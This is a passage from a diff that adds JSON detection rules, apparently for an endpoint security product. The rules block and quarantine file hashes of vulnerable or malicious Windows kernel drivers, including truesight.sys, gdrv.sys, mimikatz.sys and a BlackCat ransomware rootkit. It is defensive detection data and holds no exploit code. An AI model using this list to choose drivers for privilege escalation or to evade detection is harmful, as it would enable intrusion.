+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "574dc119-3840-538c-a80a-73ceff7626d2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.495799Z",
+ "creation_date": "2026-03-23T11:45:31.495801Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.495807Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e0872cd9f466ee89a64da287dd8dad21e0e73fd881c99f4c8200d76dcda31430",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "57649369-37b8-5350-bc75-192d7e9425cd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.817817Z",
+ "creation_date": "2026-03-23T11:45:31.817820Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.817829Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4d95a9e6997a67a6a0d585f07615677820e018e8ed1fa34e50acf0d46cbcfbf1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "57661967-aa58-5c12-81fd-887a50fdafb8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610245Z",
+ "creation_date": "2026-03-23T11:45:29.610247Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610253Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0d3790af5f8e5c945410929e31d06144a471ac82f828afe89a4758a5bbeb7f9f",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "576e210c-edd3-53d5-886a-9f1a0617b5b4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.142036Z",
+ "creation_date": "2026-03-23T11:45:31.142038Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142044Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6f75699c821358703cf59589e13d48e83d51dcb051a4af138cf0e1f7d6d92183",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "577057c5-23f1-5cf1-b8a6-45190e460df3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.143006Z",
+ "creation_date": "2026-03-23T11:45:31.143008Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.143014Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "393ff33aa9e04350277df6435f9d132f28e8af72668cc7d1db3644601dd22a47",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "577371aa-1a00-587d-af4a-269529be1886",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.477756Z",
+ "creation_date": "2026-03-23T11:45:30.477759Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.477803Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fe50be756c689ef56976d96135486ee66192a4de0b82b0d52521978fc589f6fa",
+ "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "57784f2e-1743-5405-a96b-a9ddbed4ae6b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.486747Z",
+ "creation_date": "2026-03-23T11:45:31.486750Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.486758Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d8a03dde054c42419614e7649b9453368130accaf814baad15464eaef4e8e9b3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5779cade-e444-5bde-aae0-037ec951d655",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.609094Z",
+ "creation_date": "2026-03-23T11:45:29.609096Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.609101Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8b92cdb91a2e2fab3881d54f5862e723826b759749f837a11c9e9d85d52095a2",
+ "comment": "Gigabyte vulnerable driver (aka gdrv.sys) [CVE-2018-19320] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "577cbf9a-0fc9-5e54-8006-61bfc349be68",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.820805Z",
+ "creation_date": "2026-03-23T11:45:31.820808Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.820817Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9c087844540dd9583221e2e5d10b1697cca3b8dfe1d1bffe0daf33cebcc7c524",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "57830ccb-a899-597a-9e62-dd2401600958",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.474054Z",
+ "creation_date": "2026-03-23T11:45:31.474058Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.474069Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "72d1c35e3a767ed6f6363e51e1c63f2fbfd076f7b2f2d286a64cd753122a33cb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5786eae6-a35f-54e9-a5d8-320c2399bcf4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.477820Z",
+ "creation_date": "2026-03-23T11:45:30.477824Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.477833Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "253a549a1e13a5a7e242ac1b39d5bebc61dcec7794171a58093700ae760d4b71",
+ "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5787a165-db37-5a20-bead-f5edb69594c9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.155506Z",
+ "creation_date": "2026-03-23T11:45:31.155508Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.155513Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bb0b66a978846cb92f09b2badcc5ef4a473383748e94645f81851794a0f27350",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "578ac9b1-9fe0-5dcf-a96e-02585fa08cb9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.817661Z",
+ "creation_date": "2026-03-23T11:45:30.817663Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.817669Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6575ea9b319beb3845d43ce2c70ea55f0414da2055fa82eec324c4cebdefe893",
+ "comment": "Vulnerable Kernel Driver (aka dellbios.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "578e31a5-9066-5ae2-b2f6-06e35c3e19b1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.811186Z",
+ "creation_date": "2026-03-23T11:45:31.811189Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.811194Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "31b4ddfe88418a83c71ce8d882403587caa02b2adeaedd3a24ece3863987451c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "579c7a5f-58cd-5f07-8a77-290c16ea399c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.461296Z",
+ "creation_date": "2026-03-23T11:45:30.461299Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.461308Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "88fb0a846f52c3b680c695cd349bf56151a53a75a07b8b0b4fe026ab8aa0a9af",
+ "comment": "Vulnerable Kernel Driver (aka sfdrvx64.sys) [https://www.loldrivers.io/drivers/5a03dc5a-115d-4d6f-b5b5-685f4c014a69/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "579dffb8-b7b9-59d1-b3b3-3838a865d62a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973776Z",
+ "creation_date": "2026-03-23T11:45:29.973778Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973783Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7837cb350338c4958968d06b105466da6518f5bb522a6e70e87c0cad85128408",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "57a32dc1-aa48-5e1e-86f3-9d04b0502187",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.453606Z",
+ "creation_date": "2026-03-23T11:45:30.453610Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.453619Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "677ec2df835069678876defc3ef5ff73f463ad39e8466d76632d06f6a29a494f",
+ "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "57adfffe-1eea-5ef0-8b2f-60401cf49f18",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.977107Z",
+ "creation_date": "2026-03-23T11:45:29.977109Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.977115Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b17507a3246020fa0052a172485d7b3567e0161747927f2edf27c40e310852e0",
+ "comment": "ASUS vulnerable VGA Kernel Mode Driver (aka EIO.sys) [https://www.loldrivers.io/drivers/f654ad84-c61d-477c-a0b2-d153b927dfcc/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "57b0b2e2-69ff-51b9-bec1-18c2f17e2a40",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.462228Z",
+ "creation_date": "2026-03-23T11:45:30.462231Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.462240Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "76718b87861bf6e502aa95ea85e378326c8db1759fe010c941b26cba3c881133",
+ "comment": "Malicious Kernel Driver (aka mimikatz.sys) [https://www.loldrivers.io/drivers/14556074-b235-4378-b356-f58721629d72/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "57b33225-5119-53ab-a6be-b6f8dd45035c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985539Z",
+ "creation_date": "2026-03-23T11:45:29.985541Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.985547Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5ed22c0033aed380aa154e672e8db3a2d4c195c4",
+ "comment": "Malicious BlackCat/ALPHV Ransomware Rootkit (aka fgme.sys, ktes.sys, kt2.sys and ktgn.sys) [https://www.trendmicro.com/en_us/research/23/e/blackcat-ransomware-deploys-new-signed-kernel-driver.html] [file SHA1]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "57b68ae8-9a2a-5132-8dc0-5f2598228c1e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.475988Z",
+ "creation_date": "2026-03-23T11:45:30.475991Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.475999Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6cf1cac0e97d30bb445b710fd8513879678a8b07be95d309cbf29e9b328ff259",
+ "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "57b73945-b57e-52a7-a8a1-a4f6075d183b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.454241Z",
+ "creation_date": "2026-03-23T11:45:30.454244Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.454253Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "31867db933ed4407d22de8f0ef9b52958c40c63c2328e1863dfd3fe58d3b53c3",
+ "comment": "Vulnerable Kernel Driver (aka sandra.sys) [https://www.loldrivers.io/drivers/bc5e020a-ecff-43c8-b57b-ee17b5f65b21/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "57c1f843-528d-5703-ba03-34b564d84073",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
